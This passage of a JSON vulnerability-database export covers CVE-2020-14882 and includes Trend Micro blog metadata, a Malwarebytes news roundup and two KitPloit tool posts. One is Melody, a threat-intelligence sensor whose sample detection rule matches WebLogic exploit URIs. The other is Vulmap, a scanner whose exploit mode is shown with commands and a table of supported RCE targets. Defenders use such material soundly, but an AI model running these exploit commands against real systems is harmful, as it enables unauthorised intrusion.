10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-09-14T00:00:00", "id": "TRENDMICROBLOG:64CE304907BCE85ADF8422301BEFF093", "href": "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-18T14:36:36", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T18:37:14", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-06-06T15:25:09", "description": "[![](https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H=w412-h640)](<https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H>)\n\n \n\n\n# Melody\n\nMonitor the Internet's background noise\n\nMelody is a transparent internet sensor built for [threat intelligence](<https://www.kitploit.com/search/label/Threat%20Intelligence> \"threat intelligence\" ) and supported by a detection rule framework which allows you to tag packets of interest for further analysis and threat monitoring.\n\n \n\n\n# Features\n\nHere are some key features of Melody :\n\n * Transparent capture\n * Write detection rules and tag specific packets to analyze them at scale\n * Mock [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) websites using the builtin HTTP/S server\n * Supports the main internet protocols over IPv4 and IPv6\n * Handles log rotation for you : Melody is designed to run forever on the smallest VPS\n * Minimal configuration required\n * Standalone mode : configure Melody using only the CLI\n * Easily scalable : \n * Statically compiled binary\n * Up-to-date Docker image\n\n# Wishlist\n\nSince I have to focus on other projects right now, I can't put much time in Melody's development.\n\nThere is a lot of rom for improvement though, so here are some features that I'd like to implement someday :\n\n * ~~Dedicated helper program to create, test and manage rules~~ -> Check Meloctl in `cmd/meloctl`\n * Centralized rules management\n * Per port mock application\n\n# Use cases\n\n## Internet facing sensor\n\n * Extract trends and patterns from Internet's noise\n * Index malicious activity, [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) attempts and targeted scanners\n * Monitor emerging threats exploitation\n * Keep an eye on specific threats\n\n## Stream analysis\n\n * Build a background noise profile to make targeted attacks stand out\n * Replay captures to tag malicious packets in a suspicious stream\n\n# Preview\n\n[](<https://raw.githubusercontent.com/bonjourmalware/melody/master/readme/melody_demo.gif> \"Melody is a transparent internet sensor built for threat intelligence. Supports custom tagging rules and vulnerable application simulation. \$29\$\" )[![](https://blogger.googleusercontent.com/img/a/AVvXsEhQj2eANGQieq68xNvqOhhw8784kxPiunCGgC3GG4teclp_bm223AyPN61pqQDC2WiFWKphXL1aw_d3kIJxweG-Vrtygyoyr-z6CkaXcsx3astVn2zn2GyMD4NQn35qt7RvYA6tXIgBwlKP491vMWOGiIbkyWZJA7fuslVE5gzSquz0aKOuF21jm9bT=w596-h640)](<https://blogger.googleusercontent.com/img/a/AVvXsEhQj2eANGQieq68xNvqOhhw8784kxPiunCGgC3GG4teclp_bm223AyPN61pqQDC2WiFWKphXL1aw_d3kIJxweG-Vrtygyoyr-z6CkaXcsx3astVn2zn2GyMD4NQn35qt7RvYA6tXIgBwlKP491vMWOGiIbkyWZJA7fuslVE5gzSquz0aKOuF21jm9bT>) [](<https://raw.githubusercontent.com/bonjourmalware/melody/master/readme/melody_demo_dash.png> \"Melody is a transparent internet sensor built for threat intelligence. Supports custom tagging rules and vulnerable application simulation. \$30\$\" )[![](https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H=w412-h640)](<https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H>)\n\n# Quickstart\n\n[Quickstart details.](<https://bonjourmalware.github.io/melody/installation> \"Quickstart details.\" )\n\n## TL;DR\n\n### Release\n\nGet the latest release at `https://github.com/bonjourmalware/melody/releases`.\n \n \n make install # Set default outfacing interface \n make cap # Set network capabilities to start Melody without elevated privileges \n make certs # Make self signed certs for the HTTPS fileserver \n make enable_all_rules # Enable the default rules \n make service # Create a systemd service to restart the program automatically and launch it at startup \n \n sudo systemctl stop melody # Stop the service while we're configuring it\n\nUpdate the `filter.bpf` file to filter out unwanted packets.\n \n \n sudo systemctl start melody # Start Melody \n sudo systemctl status melody # Check that Melody is running \n\nThe logs should start to pile up in `/opt/melody/logs/melody.ndjson`.\n \n \n tail -f /opt/melody/logs/melody.ndjson # | jq\n\n### From source\n \n \n git clone https://github.com/bonjourmalware/melody /opt/melody \n cd /opt/melody \n make build\n\nThen continue with the steps from the [release](<https://github.com/bonjourmalware/melody#release> \"release\" ) TL;DR.\n\n### Docker\n \n \n make certs # Make self signed certs for the HTTPS fileserver \n make enable_all_rules # Enable the default rules \n mkdir -p /opt/melody/logs \n cd /opt/melody/ \n \n docker pull bonjourmalware/melody:latest \n \n MELODY_CLI=\"\" # Put your CLI options here. Example : export MELODY_CLI=\"-s -i 'lo' -F 'dst port 5555' -o 'server.http.port: 5555'\" \n \n docker run \\ \n --net=host \\ \n -e \"MELODY_CLI=$MELODY_CLI\" \\ \n --mount type=bind,source=\"$(pwd)/filter.bpf\",target=/app/filter.bpf,readonly \\ \n --mount type=bind,source=\"$(pwd)/config.yml\",target=/app/config.yml,readonly \\ \n --mount type=bind,source=\"$(pwd)/var\",target=/app/var,readonly \\ \n --mount type=bind,source=\"$(pwd)/rules\",target=/app/rules,readonly \\ \n --mount type=bind,source=\"$(pwd)/logs\",target=/app/logs/ \\ \n bonjourmalware/melody\n\nThe logs should start to pile up in `/opt/melody/logs/melody.ndjson`.\n\n# Rules\n\n[Rule syntax details.](<https://bonjourmalware.github.io/melody/installation> \"Rule syntax details.\" )\n\n## Example\n \n \n CVE-2020-14882 Oracle Weblogic Server RCE: \n layer: http \n meta: \n id: 3e1d86d8-fba6-4e15-8c74-941c3375fd3e \n version: 1.0 \n author: BonjourMalware \n status: stable \n created: 2020/11/07 \n modified: 2020/20/07 \n description: \"Checking or trying to exploit CVE-2020-14882\" \n references: \n - \"https://nvd.nist.gov/vuln/detail/CVE-2020-14882\" \n match: \n http.uri: \n startswith|any|nocase: \n - \"/console/css/\" \n - \"/console/images\" \n contains|any|nocase: \n - \"console.portal\" \n - \"consolejndi.portal?test_handle=\" \n tags: \n cve: \"cve-2020-14882\" \n vendor: \"oracle\" \n product: \"weblogic\" \n impact: \"rce\"\n\n# Logs\n\n[Logs content details.](<https://bonjourmalware.github.io/melody/layers> \"Logs content details.\" )\n\n## Example\n\nNetcat TCP packet over IPv4 :\n \n \n { \n \"tcp\": { \n \"window\": 512, \n \"seq\": 1906765553, \n \"ack\": 2514263732, \n \"data_offset\": 8, \n \"flags\": \"PA\", \n \"urgent\": 0, \n \"payload\": { \n \"content\": \"I made a discovery today. I found a computer.\\n\", \n \"base64\": \"SSBtYWRlIGEgZGlzY292ZXJ5IHRvZGF5LiAgSSBmb3VuZCBhIGNvbXB1dGVyLgo=\", \n \"truncated\": false \n } \n }, \n \"ip\": { \n \"version\": 4, \n \"ihl\": 5, \n \"tos\": 0, \n \"length\": 99, \n \"id\": 39114, \n \"fragbits\": \"DF\", \n \"frag_offset\": 0, \n \"ttl\": 64, \n \"protocol\": 6 \n }, \n \"timestamp\": \"2020-11-16T15:50:01.277828+01:00\", \n \"session\": \"bup9368o4skolf20rt8g\", \n \"type\": \"tcp\", \n \"src_ip\": \"127.0.0.1\", \n \"dst_port\": 1234, \n \"matches\": {}, \n \"inline_matches\": [], \n \"embedded\": {} \n }\n\n \n \n\n\n**[Download Melody](<https://github.com/bonjourmalware/melody> \"Download Melody\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T12:30:00", "type": "kitploit", "title": "Melody - A Transparent Internet Sensor Built For Threat Intelligence", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-04-13T12:30:00", "id": "KITPLOIT:914458182851735372", "href": "http://www.kitploit.com/2022/04/melody-transparent-internet-sensor.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T07:41:52", "description": "[![](https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s16000/vulmap.png)](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2020-11-02T18:16:16", "description": "We had a very busy week at Malwarebytes Labs. \n\nWe offered advice on [Google's patch for an actively exploited zero-day bug that affects Chrome users](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/google-patches-exploited-zero-day-bug-that-affects-chrome-users/>), our podcast talked about [finding consumer value in Cybersecurity Awareness Month with Jamie Court](<https://blog.malwarebytes.com/podcast/2020/10/lock-and-code-s1ep18-finding-consumer-value-in-cybersecurity-awareness-month-with-jamie-court/>), we provided guidance about [keeping ransomware cash away from your business](<https://blog.malwarebytes.com/cybercrime/2020/10/keeping-ransomware-cash-away-from-your-business/>), pointed out how [scammers are spoofing bank phone numbers to rob victims](<https://blog.malwarebytes.com/social-engineering/2020/10/scammers-are-spoofing-bank-phone-numbers-to-rob-victims/>), analyzed how a [fake COVID-19 survey hides ransomware in a Canadian university attack](<https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/>), and discussed [how a new Emotet delivery method was spotted during a downward detection trend](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/new-emotet-delivery-method-spotted-during-downward-detection-trend/>). \n\nBelieve it or not, we also found time to explain what was going on with [the HP printer issue on Mac](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/hp-printer-issue-on-mac/>), analyzed how [California\u2019s Prop 24 splits data privacy supporters](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/prop-24-splits-data-privacy-supporters-in-california/>) and discussed [Vastaamo, a data breach with unprecedented consequences](<https://blog.malwarebytes.com/cybercrime/2020/10/vastaamo-psychotherapy-data-breach-sees-the-most-vulnerable-victims-extorted/>). \n\n## Other cybersecurity news\n\n * [Federal agencies](<https://www.nbcnews.com/news/us-news/fbi-other-agencies-warn-imminent-cybercrime-threat-u-s-hospitals-n1245212>) are warning of an increased and imminent cybercrime threat to US hospitals and healthcare providers, especially with regard to ransomware attacks. (Source: NBC)\n * Despite their own claims, questions have been raised as to whether the [SunCrypt](<https://securityboulevard.com/2020/09/the-curious-case-of-suncrypt/>) gang are indeed the newest members of the Maze cartel. (Source: Security Boulevard)\n * The five biggest cybersecurity threats for the healthcare industry as seen by cloud-first security firm [Wandera](<https://www.techrepublic.com/article/security-firm-identifies-5-biggest-cybersecurity-risks-for-hospitals-and-healthcare-organizations/>). (Source: TechRepublic)\n * CVE-2020-14882 A bug in [Oracle Weblogic](<https://isc.sans.edu/diary/rss/26734>) is being actively exploited, and the exploitation is trivial. (Source: InfoSec Handlers Diary Blog)\n * Foreign cyber threats to the [2020 US presidential election](<https://www.digitalshadows.com/blog-and-research/foreign-cyber-threats-to-the-2020-us-presidential-election/>) are predominantly sophisticated disinformation campaigns. (Source: digital shadows)\n * Why [satellite hacking](<https://eurasiantimes.com/why-satellite-hacking-has-become-the-biggest-global-threat-for-countries-like-us-china-russia-india/>) has become the biggest global threat for countries like the US, China, Russia, and India? (Source: The Eurasia Times)\n * [Facebook](<https://www.axios.com/facebook-warns-of-perception-hacks-undermining-trust-in-democracy-59fde96f-51a3-4dc5-b8a0-8f0a6a863840.html>) warned of perception hacks undermining trust in democracy. (Source: Axios)\n * Microsoft warned that threat actors are actively exploiting systems unpatched against the [ZeroLogon](<https://www.bleepingcomputer.com/news/security/microsoft-warns-of-ongoing-attacks-using-windows-zerologon-flaw/>) privilege escalation vulnerability in the Netlogon Remote Protocol. (Source: BleepingComputer)\n * [Email compromise attacks](<https://betanews.com/2020/10/29/email-compromise-attacks-increase/>) are on the increase as threat actors shift their focus from finance employees to group mailboxes. (Source: BetaNews)\n * [Zoom](<https://www.zdnet.com/article/zoom-rolls-out-encryption-for-all-desktop-and-mobile-users/>) has kicked off end-to-end encryption for its mobile and desktop apps. (Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (October 26 \u2013 November 1)](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/a-week-in-security-october-26-november-1/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-02T17:46:12", "type": "malwarebytes", "title": "A week in security (October 26 \u2013 November 1)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 